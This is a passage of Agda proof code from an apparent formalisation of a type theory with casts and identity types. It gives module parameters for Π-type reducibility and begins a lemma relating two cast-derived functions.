([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ^ [ ! , ι ⁰ ])) (G₃-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / ([F₃] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ≡ wk (lift ρ) G₃ [ b ] ^ [ ! , ι ⁰ ] / ([G₃] [ρ] ⊢Δ [a]))) (⊢A₄ : Γ ⊢ A₄ ^ [ ! , ι ⁰ ]) (⊢ΠF₄G₄ : Γ ⊢ Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₄ : Γ ⊢ A₄ ⇒* Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₄ : Γ ⊢ F₄ ^ [ rF , ι ⁰ ]) (⊢G₄ : (Γ ∙ F₄ ^ [ rF , ι ⁰ ]) ⊢ G₄ ^ [ ! , ι ⁰ ]) (A₄≡A₄ : Γ ⊢ (Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰) ≅ (Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₄] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₄ ^ [ rF , ι ⁰ ]) ([G₄] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₄ [ a ] ^ [ ! , ι ⁰ ])) (G₄-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / ([F₄] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₄ [ a ] ≡ wk (lift ρ) G₄ [ b ] ^ [ ! , ι ⁰ ] / ([G₄] [ρ] ⊢Δ [a]))) (A₁≡A₂ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ≅ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (A₃≡A₄ : Γ ⊢ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ≅ Π F₄ ^ rF ° ⁰ ▹ G₄ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) ([F₁≡F₂] : ∀ {ρ Δ} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ≡ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([F₃≡F₄] : ∀ {ρ Δ} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₃ ≡ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) ([G₁≡G₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) ([G₃≡G₄] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ a ] ≡ wk (lift ρ) G₄ [ a ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [a]) (⊢e₁₃ : Γ ⊢ e₁₃ ∷ Id (U ⁰) A₁ A₃ ^ [ % , ι ¹ ]) (⊢e₂₄ : Γ ⊢ e₂₄ ∷ Id (U ⁰) A₂ A₄ ^ [ % , ι ¹ ]) (⊢t₁ : Γ ⊢ t₁ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df₁ : Γ ⊢ t₁ ⇒* f₁ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰) ([f₁ext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ≡ wk ρ f₁ ∘ b ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) ([f₁] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) (⊢t₂ : Γ ⊢ t₂ ∷ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df₂ : Γ ⊢ t₂ ⇒* f₂ ∷ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ ι ⁰) ([f₂ext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₂ ∘ a ^ ⁰ ≡ wk ρ f₂ ∘ b ^ ⁰ ∷ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [a]) ([f₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₂ ∘ a ^ ⁰ ∷ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [a]) ([f₁≡f₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ≡ wk ρ f₂ ∘ a ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) (recursor₁ : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) e t ∷ wk (lift ρ) G₃ [ y ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [y]) (recursor₂ : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) e t ∷ wk (lift ρ) G₄ [ y ] ^ [ ! , ι ⁰ ] / [G₄] [ρ] ⊢Δ [y]) (extrecursor₁ : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G₁ [ x′ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x′ ]) (wk (lift ρ) G₃ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G₁ [ x′ ]) (wk (lift ρ) G₃ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₃ [ y ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [y]) (extrecursor₂ : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G₂ [ x′ ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x′ ]) (wk (lift ρ) G₄ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G₂ [ x′ ]) (wk (lift ρ) G₄ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₄ [ y ] ^ [ ! , ι ⁰ ] / [G₄] [ρ] ⊢Δ [y]) (eqrecursor : ∀ {ρ Δ x₁ x₂ x₃ x₄ t₁ t₂ e₁₃ e₂₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x₁] : Δ ⊩⟨ ι ⁰ ⟩ x₁ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x₂] : Δ ⊩⟨ ι ⁰ ⟩ x₂ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([G₁x₁≡G₂x₂] : Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ x₁ ] ≡ wk (lift ρ) G₂ [ x₂ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → ([x₃] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([G₃x₃≡G₄x₄] : Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ x₃ ] ≡ wk (lift ρ) G₄ [ x₄ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃]) → ([t₁] : Δ ⊩⟨ ι ⁰ ⟩ t₁ ∷ wk (lift ρ) G₁ [ x₁ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → ([t₂] : Δ ⊩⟨ ι ⁰ ⟩ t₂ ∷ wk (lift ρ) G₂ [ x₂ ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x₂]) → ([t₁≡t₂] : Δ ⊩⟨ ι ⁰ ⟩ t₁ ≡ t₂ ∷ wk (lift ρ) G₁ [ x₁ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → (⊢e₁₃ : Δ ⊢ e₁₃ ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x₁ ]) (wk (lift ρ) G₃ [ x₃ ]) ^ [ % , ι ¹ ]) → (⊢e₂₄ : Δ ⊢ e₂₄ ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x₂ ]) (wk (lift ρ) G₄ [ x₄ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x₁ ]) (wk (lift ρ) G₃ [ x₃ ]) e₁₃ t₁ ≡ cast ⁰ (wk (lift ρ) G₂ [ x₂ ]) (wk (lift ρ) G₄ [ x₄ ]) e₂₄ t₂ ∷ wk (lift ρ) G₃ [ x₃ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃]) ([b₁] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e) x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([bext₁] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e) x ≡ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e′) y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([b₂] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e) x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([bext₂] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e) x ≡ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e′) y ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([b₁≡b₂] : ∀ {ρ Δ e₁₃ e₂₄ x₃ x₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e₁₃ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊢ e₂₄ ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x₃ ≡ x₄ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e₁₃) x₃ ≡ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e₂₄) x₄ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) where module g₁ = cast-ΠΠ-lemmas-2 ⊢Γ ⊢A₁ ⊢ΠF₁G₁ D₁ ⊢F₁ ⊢G₁ A₁≡A₁ [F₁] [G₁] G₁-ext ⊢A₃ ⊢ΠF₃G₃ D₃ ⊢F₃ ⊢G₃ A₃≡A₃ [F₃] [G₃] G₃-ext ⊢e₁₃ recursor₁ extrecursor₁ ⊢t₁ Df₁ [f₁ext] [f₁] [b₁] [bext₁] module g₂ = cast-ΠΠ-lemmas-2 ⊢Γ ⊢A₂ ⊢ΠF₂G₂ D₂ ⊢F₂ ⊢G₂ A₂≡A₂ [F₂] [G₂] G₂-ext ⊢A₄ ⊢ΠF₄G₄ D₄ ⊢F₄ ⊢G₄ A₄≡A₄ [F₄] [G₄] G₄-ext ⊢e₂₄ recursor₂ extrecursor₂ ⊢t₂ Df₂ [f₂ext] [f₂] [b₂] [bext₂] [g₁≡g₂] : ∀ {ρ Δ x₃ x₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x₃] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([x₃≡x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ≡ x₄ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g₁.g ρ x₃ ≡ g₂.g ρ x₄ ∷ wk (lift ρ) G₃ [ x₃ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃] [g₁≡g₂] {ρ} {Δ} {x₃} {x₄} [ρ] ⊢Δ [x₃] [x₄] [x₃≡x₄] = let [b₁] = [b₁] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₁.⊢fste) [x₃] [b₂] = [b₂] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₂.⊢fste) [x₄] [b₁≡b₂]′ = [b₁≡b₂] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₁.⊢fste) (Twk.wkTerm [ρ] ⊢Δ g₂.⊢fste) [x₃] [x₄] [x₃≡x₄] [b₁:F₂] = convTerm₁ ([F₁] [ρ] ⊢Δ) ([F₂] [ρ] ⊢Δ) ([F₁≡F₂] [ρ] ⊢Δ) [b₁] [b₁≡b₂:F₂] = convEqTerm₁ ([F₁] [ρ] ⊢Δ) ([F₂] [ρ] ⊢Δ) ([F₁≡F₂] [ρ] ⊢Δ) [b₁≡b₂]′ [G₁b₁≡G₂b₂] = transEq ([G₁] [ρ] ⊢Δ [b₁]) ([G₂] [ρ] ⊢Δ [b₁:F₂]) ([G₂] [ρ] ⊢Δ [b₂]) ([G₁≡G₂] [ρ] ⊢Δ [b₁]) (G₂-ext [ρ] ⊢Δ [b₁:F₂] [b₂] [b₁≡b₂:F₂]) [x₃:F₄] = convTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [x₃] [x₃≡x₄:F₄] = convEqTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [x₃≡x₄] [G₃x₃≡G₄x₄] = transEq ([G₃] [ρ] ⊢Δ [x₃]) ([G₄] [ρ] ⊢Δ [x₃:F₄]) ([G₄] [ρ] ⊢Δ [x₄]) ([G₃≡G₄] [ρ] ⊢Δ [x₃]) (G₄-ext [ρ] ⊢Δ [x₃:F₄] [x₄] [x₃≡x₄:F₄]) [t₁] , [t₁≡f₁b₁] = redSubst*Term (appRed* (escapeTerm ([F₁] [ρ] ⊢Δ) [b₁]) (Twk.wkRed*Term [ρ] ⊢Δ Df₁)) ([G₁] [ρ] ⊢Δ [b₁]) ([f₁] [ρ] ⊢Δ [b₁]) [t₂] , [t₂≡f₂b₂] = redSubst*Term (appRed* (escapeTerm ([F₂] [ρ] ⊢Δ) [b₂]) (Twk.wkRed*Term [ρ] ⊢Δ Df₂)) ([G₂] [ρ] ⊢Δ [b₂]) ([f₂] [ρ] ⊢Δ [b₂]) [t₁≡f₂b₁] = transEqTerm ([G₁] [ρ] ⊢Δ [b₁]) [t₁≡f₁b₁] ([f₁≡f₂] [ρ] ⊢Δ [b₁]) [f₂b₁≡t₂] = symEqTerm ([G₂] [ρ] ⊢Δ [b₂]) (transEqTerm ([G₂] [ρ] ⊢Δ [b₂]) 